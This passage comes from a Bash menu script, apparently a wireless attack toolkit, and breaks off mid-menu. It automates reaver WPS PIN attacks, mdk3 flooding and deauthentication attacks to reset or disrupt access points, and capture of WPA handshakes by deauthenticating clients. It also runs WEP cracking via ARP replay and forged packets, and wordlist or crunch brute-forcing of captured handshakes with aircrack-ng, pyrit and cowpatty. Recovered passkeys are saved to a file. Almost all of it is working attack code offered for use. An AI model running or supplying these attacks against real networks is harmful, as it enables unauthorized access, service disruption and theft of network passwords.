2153. echo $RED"Reaver Attack Command:"$STAND
2154. echo "reaver -i mon0 -c $AP_channel -b $AP_bssid -p $WPSpin2 -d 2 -t 2 -T 2 -vv"
2155. echo ""
2156. read -p $GREEN"Press [Enter] to launch the attack.$STAND"
2157. clear
2158. reaver -i mon0 -c $AP_channel -b $AP_bssid -p $WPSpin2 -d 2 -t 2 -T 2 -vv -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
2159. rm reaver.txt
2160. echo ""
2161. fi
2162.  
2163. if [[ $PinOption == "3" ]]; then
2164. clear
2165. echo $RED"Reaver Attack Command:"$STAND
2166. echo "reaver -i mon0 -c $AP_channel -b $AP_bssid -p $easybox -d 2 -t 2 -T 2 -vv"
2167. echo ""
2168. read -p $GREEN"Press [Enter] to launch the attack.$STAND"
2169. clear
2170. reaver -i mon0 -c $AP_channel -b $AP_bssid -p $easybox -d 2 -t 2 -T 2 -vv -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
2171. rm reaver.txt
2172. echo ""
2173. fi
2174.  
2175. if [[ $PinOption == "4" ]]; then
2176. clear
2177. echo $RED"Reaver Attack Command:"$STAND
2178. echo "reaver -i mon0 -c $AP_channel -b $AP_bssid -p $PIN4REAVER -d 2 -t 2 -T 2 -vv"
2179. echo ""
2180. read -p $GREEN"Press [Enter] to launch the attack.$STAND"
2181. clear
2182. reaver -i mon0 -c $AP_channel -b $AP_bssid -p $PIN4REAVER -d 2 -t 2 -T 2 -vv -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
2183. rm reaver.txt
2184. echo ""
2185. fi ;;
2186.  
2187. 2)
2188. clear
2189. echo $RED"Current Reaver Attack Command:"$STAND
2190. echo "reaver -i mon0 -c $AP_channel -b $AP_bssid $ReaverOptions"
2191. echo ""
2192. read -p $GREEN"Please input any additional reaver options (eg: -vv):$STAND " ReaverOptions
2193. echo ""
2194. echo $RED"New Reaver Attack Command:"$STAND
2195. echo "reaver -i mon0 -c $AP_channel -b $AP_bssid $ReaverOptions"
2196. echo ""
2197. read -p $GREEN"Press [Enter] to launch the attack.$STAND"
2198. reaver -i mon0 -c $AP_channel -b $AP_bssid $ReaverOptions -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
2199. rm reaver.txt
2200.  
2201. ################## START OF: MDK3 ACCESS POINT RESET ############################################
2202.  
2203. echo ""
2204. echo ""
2205. echo $GREEN"Would you like to try to reset the access point? Y/n"$STAND
2206. read a
2207. if [[ $a == "Y" || $a == "y" || $a = "" ]]; then
2208.  
2209. echo "Press the [Enter] button 3 times on the kismet screen, wait 5-10 seconds then press Ctrl+c."
2210. kismet ncsource=mon0:hop=true
2211. sleep 5
2212.  
2213. echo ""
2214. echo $RED"Target essid:$STAND $AP_essid"
2215. echo ""
2216. read -p $GREEN"Please input the above target essid.$STAND" MDK3_Target
2217. echo ""
2218. cat $HOME/scrypta/temp/*.nettxt | sed -n "/$MDK3_Target/,/Channel/p"
2219.  
2220. echo 'AP_bssid="'"$AP_bssid"'"' > MDK3_APbssid.txt
2221. sleep 1
2222. echo 'AP_channel="'"$AP_channel"'"' > MDK3_APchannel.txt
2223. sleep 1
2224. cat MDK3_APbssid.txt | sed 's/AP_bssid=//' | sed 's/"//g' > MDK3_APbssid_1.txt
2225. sleep 1
2226. cat MDK3_APchannel.txt | sed 's/AP_channel=//' | sed 's/"//g' > MDK3_APchannel_1.txt
2227. sleep 1
2228. echo $AP_bssid > Blacklist.txt
2229.  
2230. echo ""
2231. echo $GREEN"Does the access point support WAP+TKIP?"
2232. echo $GREEN"[1]$BLUE = Yes."
2233. echo $GREEN"[2]$BLUE = No."
2234. echo $GREEN"1 or 2?"$STAND
2235. read option
2236.  
2237. if [[ $option == "1" ]]; then
2238.  
2239. read -s -n1 -p $GREEN"Would you like to scan for clients connected to the target access point? Y/n:$STAND " ClientScan
2240.  
2241. if [[ $ClientScan == "Y" || $ClientScan == "y" ]]; then
2242. xterm -geometry 111x24+650+0 -e airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0
2243. echo ""
2244. echo ""
2245. fi
2246.  
2247. echo $GREEN"Did the access point have any clients connected to it?"
2248. echo $GREEN"[1]$BLUE = Yes."
2249. echo $GREEN"[2]$BLUE = No."
2250. echo $GREEN"1 or 2?"$STAND
2251. read MDK3_ClientChoice
2252.  
2253. if [[ $MDK3_ClientChoice == "1" ]]; then
2254.  
2255. echo '#!/bin/bash
2256.  
2257. RED=$(tput setaf 1 && tput bold)
2258. GREEN=$(tput setaf 2 && tput bold)
2259. STAND=$(tput sgr0)
2260.  
2261. AP_bssid=$(cat $HOME/scrypta/temp/MDK3_APbssid_1.txt)
2262. sleep 1
2263. AP_channel=$(cat $HOME/scrypta/temp/MDK3_APchannel_1.txt)
2264. echo ""
2265. echo $GREEN"Press Ctrl+c on this screen to terminate the MDK3 attack and continue.$STAND"
2266.  
2267. xterm -geometry 100x10+675+0 -e "mdk3 mon0 a -a $AP_bssid -m" &
2268. xterm -geometry 100x10+675+185 -e "mdk3 mon0 d -b $HOME/scrypta/temp/Blacklist.txt -c $AP_channel" &
2269. xterm -geometry 100x10+675+345 -e "mdk3 mon0 b -t $AP_bssid" &
2270. xterm -geometry 100x10+675+345 -e "mdk3 mon0 m -t $AP_bssid -j" &
2271.  
2272. while :
2273. do
2274. xterm -geometry 95x20+0+500 -e "airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0" &
2275. sleep 20
2276. kill `pidof airodump-ng`
2277. done' > $HOME/scrypta/temp/MDK3_AP_Reset.sh
2278.  
2279. fi
2280.  
2281. if [[ $MDK3_ClientChoice == "2" ]]; then
2282.  
2283. echo '#!/bin/bash
2284.  
2285. RED=$(tput setaf 1 && tput bold)
2286. GREEN=$(tput setaf 2 && tput bold)
2287. STAND=$(tput sgr0)
2288.  
2289. AP_bssid=$(cat $HOME/scrypta/temp/MDK3_APbssid_1.txt)
2290. sleep 1
2291. AP_channel=$(cat $HOME/scrypta/temp/MDK3_APchannel_1.txt)
2292. echo ""
2293. echo $GREEN"Press Ctrl+c on this screen to terminate the MDK3 attack and continue.$STAND"
2294.  
2295. xterm -geometry 100x10+675+0 -e "mdk3 mon0 a -a $AP_bssid -m" &
2296. xterm -geometry 100x10+675+185 -e "mdk3 mon0 d -b $HOME/scrypta/temp/Blacklist.txt -c $AP_channel" &
2297. xterm -geometry 100x10+675+345 -e "mdk3 mon0 b -t $AP_bssid" &
2298. xterm -geometry 100x10+675+345 -e "mdk3 mon0 m -t $AP_bssid" &
2299.  
2300. while :
2301. do
2302. xterm -geometry 95x20+0+500 -e "airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0" &
2303. sleep 20
2304. kill `pidof airodump-ng`
2305. done' > $HOME/scrypta/temp/MDK3_AP_Reset.sh
2306.  
2307. fi
2308. fi
2309.  
2310. if [[ $option == "2" ]]; then
2311.  
2312. echo '#!/bin/bash
2313.  
2314. RED=$(tput setaf 1 && tput bold)
2315. GREEN=$(tput setaf 2 && tput bold)
2316. STAND=$(tput sgr0)
2317.  
2318. AP_bssid=$(cat $HOME/scrypta/temp/MDK3_APbssid_1.txt)
2319. sleep 1
2320. AP_channel=$(cat $HOME/scrypta/temp/MDK3_APchannel_1.txt)
2321. echo ""
2322. echo $GREEN"Press Ctrl+c on this screen to terminate the MDK3 attack and continue.$STAND"
2323.  
2324. xterm -geometry 100x10+675+0 -e "mdk3 mon0 a -a $AP_bssid -m" &
2325. xterm -geometry 100x10+675+185 -e "mdk3 mon0 d -b $HOME/scrypta/temp/Blacklist.txt -c $AP_channel" &
2326. xterm -geometry 100x10+675+345 -e "mdk3 mon0 b -t $AP_bssid" &
2327.  
2328. while :
2329. do
2330. xterm -geometry 95x20+0+500 -e "airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0" &
2331. sleep 20
2332. kill `pidof airodump-ng`
2333. done' > $HOME/scrypta/temp/MDK3_AP_Reset.sh
2334.  
2335. fi
2336.  
2337. sleep 1
2338. chmod +x $HOME/scrypta/temp/MDK3_AP_Reset.sh
2339. sleep 1
2340. Eterm -g 100x10-640-500 --cmod "red" -T "Main Window - Press Ctrl+c to exit MDK3" -e sh -c "$HOME/scrypta/temp/MDK3_AP_Reset.sh; bash"
2341. rm $HOME/scrypta/temp/Blacklist.txt
2342.  
2343. if [[ $a == "N" || $a == "n" ]]; then
2344. echo ""
2345. fi
2346. fi
2347. ################## END OF: MDK3 ACCESS POINT RESET ############################################
2348.  
2349. echo "" ;;
2350. 0) exit 0;;
2351. *) echo "";
2352. echo "Press [Enter] to continue. . ." ; read ;;
2353. esac
2354.  
2355. ############## End Of Reaver Attacks And Store Recovered Passkey ##############
2356.  
2357. ######################## LOOP ############################################
2358.  
2359. clear
2360. read -s -n1 -p $RED"Choose another target or return to the main menu:$GREEN
2361. y $BLUE= Choose another target.$GREEN
2362. n $BLUE= Return to main menu.$GREEN
2363. Please choose y/n?$STAND: " CONFIRM
2364. case $CONFIRM in
2365. n|N|NO|no|No)
2366. break ;;
2367. *) echo "" ;;
2368. esac
2369. done
2370.  
2371. ############## End Of Loop Section ##############
2372.  
2373. ############## Start Of Cleanup ##############
2374.  
2375. rm *.txt
2376. rm *.py
2377. cd
2378. ############## End Of Cleanup ##############
2379. ;;
2380.  
2381. ###### [4] Capture WPA/WPA2 Handshake ######
2382. 4)
2383. cd $HOME/scrypta/temp
2384. clear
2385. echo $RED"Scan for possible targets."
2386. echo $GREEN"Once you've identified a target press Ctrl-C to exit the scan and to continue."
2387. read -p $GREEN"Press [Enter] to start the scan.$STAND"
2388.  
2389. xterm -geometry 111x35+650+0 -l -lf WPA_Scan.txt -e airodump-ng --encrypt WPA mon0
2390.  
2391. tac WPA_Scan.txt | grep 'CIPHER' -m 1 -B 9999 | tac | sed -n '/STATION/q;p' | grep "PSK" | sed -r -e 's/\./ /' | sed '/<length: 0>/d' > temp0.txt
2392. cat temp0.txt | sed 's/^..........................................................................//' | nl -ba -w 1 -s ': ' | awk '{ print $1, $2 }' | sed 's/^1:/ 1:/' | sed 's/^2:/ 2:/' | sed 's/^3:/ 3:/' | sed 's/^4:/ 4:/' | sed 's/^5:/ 5:/' | sed 's/^6:/ 6:/' | sed 's/^7:/ 7:/' | sed 's/^8:/ 8:/' | sed 's/^9:/ 9:/' > PresentedAPs.txt
2393. sleep 1
2394.  
2395. PresentedAPs=$(cat PresentedAPs.txt)
2396. sleep 1
2397. echo ""
2398. echo "Please choose an AP"
2399. echo ""
2400. echo "$PresentedAPs"
2401. echo ""
2402. read -p $GREEN"Please input the number of your chosen target:$STAND " Chosen_AP
2403. echo ""
2404.  
2405. Chosen_AP_Details=$(cat temp0.txt | sed -n ""$Chosen_AP"p")
2406. AP_essid=`echo "$Chosen_AP_Details" | awk '{ print $11 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
2407. AP_bssid=`echo "$Chosen_AP_Details" | awk '{ print $1 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
2408. AP_channel=`echo "$Chosen_AP_Details" | awk '{ print $6 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
2409.  
2410. clear
2411. echo $RED"Chosen Target Details."$STAND
2412. echo $RED"Aceess Point essid$STAND: $AP_essid"
2413. echo $RED"Aceess Point bssid$STAND: $AP_bssid"
2414. echo $RED"Aceess Point Channel Number$STAND: $AP_channel"
2415.  
2416. echo ""
2417. echo $RED"Scan for clients connected to$STAND $AP_essid"
2418. echo $RED"Once you have identified the client you wish to target press Ctrl-C to exit"$STAND
2419. read -p $GREEN"Press [Enter] to start the scan."$STAND
2420.  
2421. xterm -geometry 100x20+650+0 -l -lf WPA_ClientScan.txt -e airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0
2422.  
2423. while true
2424. do
2425.  
2426. tac WPA_ClientScan.txt | grep 'CIPHER' -m 1 -B 9999 | tac | sed -r -e 's/\./ /' | sed '$d' | sed '1,6d' | awk '{ print $2 }' > temp1.txt
2427. cat temp1.txt | nl -ba -w 1 -s ': ' > ConnectedClientsScan.txt
2428. ConnectedClientsScan=$(cat ConnectedClientsScan.txt)
2429.  
2430. sleep 2
2431. echo ""
2432. echo $RED"Please choose a client MAC address"$STAND
2433. echo ""
2434. echo "$ConnectedClientsScan"
2435. echo ""
2436. read -p $GREEN"Please input the number of your chosen client MAC address:$STAND " Chosen_Client
2437. echo ""
2438.  
2439. sleep 1
2440. Chosen_Client_MAC=$(cat temp1.txt | sed -n ""$Chosen_Client"p")
2441. echo ""
2442. echo $RED"Chosen Client MAC Address."$STAND
2443. echo "$Chosen_Client_MAC"
2444. echo ""
2445.  
2446. xterm -geometry 100x20+675+0 -e "airodump-ng -c $AP_channel --ignore-negative-one -w psk --bssid $AP_bssid mon0" &
2447.  
2448. echo $RED"Choose an option:"
2449. echo $GREEN"[1]$BLUE = De-Authenticate The Chosen Client?."
2450. echo $GREEN"[2]$BLUE = De-Authenticate All Connected Clients?."
2451. echo $GREEN"[3]$BLUE = Choose another client."
2452. echo $GREEN"1, 2, or 3?"$STAND
2453. read option
2454.  
2455. if [[ $option == "1" ]]; then
2456. echo "De-Authenticate a single client."
2457. xterm -geometry 100x20+675+350 -e "aireplay-ng -0 10 --ignore-negative-one -a $AP_bssid -c $Chosen_Client_MAC mon0"
2458. fi
2459. if [[ $option == "2" ]]; then
2460. echo "De-Authenticate all connected clients."
2461. xterm -geometry 100x20+675+350 -e "aireplay-ng -0 10 --ignore-negative-one -a $AP_bssid mon0"
2462. fi
2463. if [[ $option == "3" ]]; then
2464. clear
2465. echo "Please choose a client"
2466. echo ""
2467. echo "$ConnectedClientsScan"
2468. echo ""
2469. read -p $GREEN"Please input the number of the chosen client:$STAND " Chosen_Client
2470. echo ""
2471. Chosen_Client_MAC=$(cat temp1.txt | sed -n ""$Chosen_Client"p")
2472. echo ""
2473. echo "Chosen Target Details."
2474. echo "$Chosen_Client_MAC"
2475. sleep 4
2476. fi
2477.  
2478. clear
2479. echo -n $GREEN"Re-send de-auth request or choose another client? (y or n)$STAND: "
2480. read -e CONFIRM
2481. case $CONFIRM in
2482. n|N|NO|no|No)
2483. break ;;
2484. *) echo "" ;;
2485. esac
2486. done
2487.  
2488. rm WPA_Scan.txt
2489. rm temp0.txt
2490. rm PresentedAPs.txt
2491.  
2492. rm WPA_ClientScan.txt
2493. rm temp1.txt
2494. rm ConnectedClientsScan.txt
2495.  
2496. kill `pidof airodump-ng`
2497. rm *.csv
2498. rm *.netxml
2499. mv *.cap $HOME/scrypta/Captured_Handshakes/$AP_essid.cap
2500. cd
2501. ;;
2502.  
2503. ###### [5] WEP Attacks ######
2504. 5)
2505. cd $HOME/scrypta/temp
2506. clear
2507. echo $RED"Scan for possible targets."$STAND
2508. echo $GREEN"Once you've identified a target press Ctrl-C to exit the scan and to continue."$STAND
2509. read -p $GREEN"Press [Enter] to start the scan.$STAND"
2510.  
2511. xterm -geometry 111x35+650+0 -l -lf WEP_Scan.txt -e airodump-ng --encrypt WEP mon0
2512.  
2513. sleep 1
2514. tac WEP_Scan.txt | grep 'CIPHER' -m 1 -B 9999 | tac | sed -n '/STATION/q;p' | sed '1,2d' | sed '$d' | sed '/<length: 0>/d' > temp0.txt
2515. sleep 1
2516. PresentedAPs=$(cat temp0.txt | awk '{ print $10 }' | nl -ba -w 1 -s ': ' | sed 's/^[ \t]*//;s/[ \t]*$//' )
2517.  
2518. clear
2519. echo $RED"Please choose a target"$STAND
2520. echo ""
2521. echo "$PresentedAPs"
2522. echo ""
2523. read -p $GREEN"Please input the number of your chosen target:$STAND " Chosen_AP
2524. echo ""
2525.  
2526. Chosen_AP_Details=$(cat temp0.txt | sed -n ""$Chosen_AP"p")
2527. AP_essid=`echo "$Chosen_AP_Details" | awk '{ print $10 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
2528. AP_bssid=`echo "$Chosen_AP_Details" | awk '{ print $1 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
2529. AP_channel=`echo "$Chosen_AP_Details" | awk '{ print $6 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
2530.  
2531. clear
2532. echo $RED"Chosen Target Details."$STAND
2533. echo $RED"Aceess Point essid$STAND: $AP_essid"
2534. echo $RED"Aceess Point bssid$STAND: $AP_bssid"
2535. echo $RED"Aceess Point Channel Number$STAND: $AP_channel"
2536. echo ""
2537. echo $RED"Scan for clients connected to$STAND $AP_essid."
2538. echo $RED"When you've identified a target press Ctrl-C to exit.$STAND"
2539. read -p $GREEN"Press [Enter] to start the scan."$STAND
2540.  
2541. sleep 1
2542. xterm -geometry 111x35+650+0 -l -lf WEP_ClientScan.txt -e airodump-ng -c $AP_channel --bssid $AP_bssid mon0
2543.  
2544. echo ""
2545. echo $GREEN"Did the access point have any clients connected to it?. (y/n)$STAND"
2546. read answer
2547.  
2548. if [[ $answer == "y" || $answer == "Y" ]]; then
2549.  
2550. tac WEP_ClientScan.txt | grep 'STATION' -m 1 -B 9999 | tac | awk '{ print $2 }' | sed '1,2d' | sed '$d' > ClientScan.txt
2551. sleep 2
2552. PresentedClients=$(cat ClientScan.txt | awk '{ print $1 }' | nl -ba -w 1 -s ': ' | sed 's/^[ \t]*//;s/[ \t]*$//')
2553.  
2554. sleep 2
2555. clear
2556. echo "Please choose a client"
2557. echo ""
2558. echo "$PresentedClients"
2559. echo ""
2560.  
2561. read -p $GREEN"Please input the number of your chosen target:$STAND " Chosen_Client
2562. echo ""
2563.  
2564. Chosen_ClientMAC=$(cat ClientScan.txt | sed -n ""$Chosen_Client"p")
2565. ClientMAC=`echo "$Chosen_AP_Details" | awk '{ print $1 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
2566.  
2567. echo $RED"You've chosen:"
2568. echo $RED"Client$STAND: $ClientMAC"
2569. echo ""
2570.  
2571. while true
2572. do
2573.  
2574. read -p $GREEN"Press [Enter] to start the attack.$STAND"
2575. xterm -e "airodump-ng -w capture --bssid $AP_bssid -c $AP_channel mon0" &
2576. xterm -e "sleep 1 && aireplay-ng -1 0 -e $AP_essid -a $AP_bssid -h $ClientMAC --ignore-negative-one mon0" &
2577. xterm -e "sleep 1 && aireplay-ng -3 -b $AP_bssid -h $ClientMAC --ignore-negative-one mon0" &
2578. echo $RED"NOTE: There's a 60 second delay before Aircrack-ng starts the cracking process."
2579. echo "Please wait for aircrack to start...$STAND"
2580. sleep 60
2581. aircrack-ng -b $AP_bssid *.cap -l WEPpasskey.txt
2582. sleep 2
2583. passkey=$(cat WEPpasskey.txt)
2584. sleep 2
2585. kill `pidof xterm`
2586. echo ""
2587. echo $RED"Target essid$STAND: $AP_essid"
2588. echo $RED"Target bssid$STAND: $AP_bssid"
2589. echo $RED"Target Pass-Key$STAND: $passkey"
2590.  
2591. echo -n $GREEN"Was the attack successful? (y or n)$STAND: "
2592. read -e CONFIRM
2593. case $CONFIRM in
2594. y|Y|YES|yes|Yes)
2595. break ;;
2596. *) echo $RED"Please re-enter information$STAND" ;;
2597. esac
2598. done
2599.  
2600. echo AP ESSID: $AP_essid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
2601. echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
2602. echo WEP Passkey: $passkey >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
2603. echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
2604. cd
2605. fi
2606. if [[ $answer == "n" || $answer == "N" ]]; then
2607. while true
2608. do
2609.  
2610. echo $RED"Starting packet capture, press Ctrl+c to end it"$STAND
2611. xterm -geometry 100x20+675+0 -e "airodump-ng -c $AP_channel --bssid $AP_bssid --ivs -w capture mon0" & AIRODUMPPID=$!
2612. sleep 2
2613. aireplay-ng -1 0 -a $AP_bssid -h $mon0mac --ignore-negative-one mon0
2614. sleep 2
2615. aireplay-ng -5 -b $AP_bssid -h $mon0mac --ignore-negative-one mon0
2616. sleep 2
2617. packetforge-ng -0 -a $AP_bssid -h $mon0mac -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-packet mon0
2618. sleep 2
2619. xterm -geometry 100x20+675+100 -e "aireplay-ng -2 -r arp-packet --ignore-negative-one mon0" & AIREPLAYPID=$!
2620. sleep 2
2621.  
2622. echo ""
2623. echo $GREEN"Attempt to crack the passkey if the data increases, Is the data increasing?. (y/n)$STAND"
2624. read option
2625.  
2626. if [[ $option == "y" ]]; then
2627. aircrack-ng -n 128 -b $AP_bssid *.ivs -l WEPpasskey.txt
2628. passkey=$(cat WEPpasskey.txt)
2629. rm WEPpasskey.txt
2630. kill ${AIRODUMPPID}
2631. kill ${AIREPLAYPID}
2632. rm *.ivs
2633. rm *.cap
2634. rm *.xor
2635. rm arp-packet
2636. echo AP ESSID: $AP_essid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
2637. echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
2638. echo WEP Passkey: $passkey >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
2639. echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
2640. fi
2641.  
2642. echo -n $GREEN"Was the attack successful? (y or n)$STAND: "
2643. read -e CONFIRM
2644. case $CONFIRM in
2645. y|Y|YES|yes|Yes)
2646. break ;;
2647. *) echo ""
2648. esac
2649. done
2650. fi
2651. cd
2652. ;;
2653.  
2654. ###### [6] Attack Handshake.cap Files ######
2655. 6)
2656. clear
2657. echo $RED"###################################"
2658. echo "# #"
2659. echo "# With a wordlist #"
2660. echo "# $GREEN[1]$BLUE = Aircrack-ng $RED#"
2661. echo "# $GREEN[2]$BLUE = Pyrit $RED#"
2662. echo "# $GREEN[3]$BLUE = Pyrit + Cowpatty $RED#"
2663. echo "# #"
2664. echo "# Without a wordlist #"
2665. echo "# $GREEN[4]$BLUE = Crunch + Aircrack-ng $RED#"
2666. echo "# $GREEN[5]$BLUE = Crunch + Pyrit $RED#"
2667. echo "# $GREEN[6]$BLUE = Crunch + Pyrit + Cowpatty $RED#"
2668. echo "# #"
2669. echo "###################################"
2670. echo
2671. echo $GREEN"Choose an option?"$STAND
2672. read option
2673. if [[ $option == "1" ]]; then
2674. clear
2675. echo $RED
2676. echo "############################################"
2677. echo "# #"
2678. echo "#$STAND Attack Capture File Using A Wordlist $RED#"
2679. echo "#$STAND (Aircrack-ng) $RED#"
2680. echo "# #"
2681. echo "############################################"
2682. echo
2683. echo $RED"eg: /root/Desktop/sky12345.cap"
2684. read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
2685. echo
2686. echo $RED"eg: /root/Desktop/wordlist.txt"
2687. read -p $GREEN"Wordlist location, name, extension$STAND: " WordlistNameLocation
2688. clear
2689. # Chosen user input options
2690. ############################
2691. echo
2692. echo $RED"You've chosen:"
2693. echo "=============="
2694. echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
2695. echo $RED"Wordlist location, name, extension$STAND: $WordlistNameLocation"
2696. echo
2697. echo $RED"Commands to launch:"
2698. echo "==================="
2699. echo $STAND"aircrack-ng -w $WordlistNameLocation $CapNameLocation"
2700. echo
2701. # Launch chosen commands/options
2702. #################################
2703. read -p $GREEN"Press enter to start"$STAND
2704. clear
2705. aircrack-ng -w $WordlistNameLocation $CapNameLocation
2706. fi
2707. if [[ $option == "2" ]]; then
2708. clear
2709. echo $RED
2710. echo "############################################"
2711. echo "# #"
2712. echo "#$STAND Attack Capture File Using A Wordlist $RED#"
2713. echo "#$STAND (Pyrit) $RED#"
2714. echo "# #"
2715. echo "############################################"
2716. echo
2717. echo $RED"eg: 00:11:22:33:44:55"
2718. read -p $GREEN"Access Point bssid$STAND: " bssid
2719. echo
2720. echo $RED"eg: /root/Desktop/sky12345.cap"
2721. read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
2722. echo
2723. echo $RED"eg: /root/Desktop/wordlist.txt"
2724. read -p $GREEN"Wordlist location, name, extension$STAND: " WordlistNameLocation
2725. clear
2726. # Chosen user input options
2727. ############################
2728. echo
2729. echo $RED"You've chosen:"
2730. echo "=============="
2731. echo $RED"Access Point bssid$STAND: $bssid"
2732. echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
2733. echo $RED"Wordlist location, name, extension$STAND: $WordlistNameLocation"
2734. echo
2735. echo $RED"Commands to launch:"
2736. echo "==================="
2737. echo $STAND"pyrit -r $CapNameLocation -i $WordlistNameLocation -b $bssid attack_passthrough"
2738. echo
2739. # Launch chosen commands/options
2740. #################################
2741. read -p $GREEN"Press enter to start"$STAND
2742. clear
2743. pyrit -r $CapNameLocation -i $WordlistNameLocation -b $bssid attack_passthrough
2744. fi
2745. if [[ $option == "3" ]]; then
2746. clear
2747. echo $RED
2748. echo "############################################################################"
2749. echo "# #"
2750. echo "#$STAND Attack Capture File Using A Wordlist $RED#"
2751. echo "#$STAND (Pyrit + Cowpatty) $RED#"
2752. echo "# #"
2753. echo "############################################################################"$STAND
2754. echo
2755. echo $RED"eg: sky12345"
2756. read -p $GREEN"Access Point essid$STAND: " essid
2757. echo
2758. echo $RED"eg: /root/Desktop/sky12345.cap"
2759. read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
2760. echo
2761. echo $RED"eg: /root/Desktop/wordlist.txt"
2762. read -p $GREEN"Wordlist location, name, extension$STAND: " WordlistNameLocation
2763. clear
2764. # Chosen user input options
2765. ############################
2766. echo
2767. echo $RED"You've chosen:"
2768. echo "=============="
2769. echo $RED"Access Point essid$STAND: $essid"
2770. echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
2771. echo $RED"Wordlist location, name, extension$STAND: $WordlistNameLocation"
2772. echo
2773. echo $RED"Commands to launch:"
2774. echo "==================="
2775. echo $STAND"cat $WordlistNameLocation | pyrit -e $essid -i - -o - passthrough | cowpatty -d - -r $CapNameLocation -s $essid"
2776. echo
2777. # Launch chosen commands/options
2778. #################################
2779. read -p $GREEN"Press enter to start"$STAND
2780. clear
2781. cat $WordlistNameLocation | pyrit -e $essid -i - -o - passthrough | cowpatty -d - -r $CapNameLocation -s $essid
2782. fi
2783. if [[ $option == "4" ]]; then
2784. lear
2785. echo $RED
2786. echo "############################################################################"
2787. echo "# #"
2788. echo "#$STAND Attack a Capture file without using a wordlist file $RED#"
2789. echo "#$STAND (Crunch + Aircrack-ng) $RED#"
2790. echo "# #"
2791. echo "############################################################################"$STAND
2792. echo
2793. echo $RED"eg: abcdef23456789"
2794. read -p $GREEN"Input the characters, digits, or symbols to be used$STAND: " CharacterSet
2795. echo
2796. echo $RED"eg: 10"
2797. read -p $GREEN"Input the minimum length of the passwords$STAND: " PasswordLengthMin
2798. echo
2799. echo $RED"eg: 10"
2800. read -p $GREEN"Input the maximum length of the passwords$STAND: " PasswordLengthMax
2801. echo
2802. echo $RED"eg:"
2803. echo $RED"-d <Number> = Limits the amount of times a character, digit, or symbol can appear next to its self."
2804. echo $RED"-s XXXXXXXXXX = Start point."
2805. read -p $GREEN"Input any other optional crunch commands?$STAND: " OptionalCrunchOptions
2806. echo
2807. echo $RED"eg: sky12345"
2808. read -p $GREEN"Access Point essid$STAND: " essid
2809. echo
2810. echo $RED"eg: /root/Desktop/sky12345.cap"
2811. read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
2812. clear
2813. # Chosen user input options
2814. ############################
2815. echo
2816. echo $RED"You've chosen:"
2817. echo "=============="
2818. echo $RED"Minimum length password$STAND: $PasswordLengthMin"
2819. echo $RED"Maximum length of password$STAND: $PasswordLengthMax"
2820. echo $RED"Characters, digits, symbols to be used in the passwords$STAND: $CharacterSet"
2821. echo $RED"Other crunch commands?$STAND: $OptionalCrunchOptions"
2822. echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
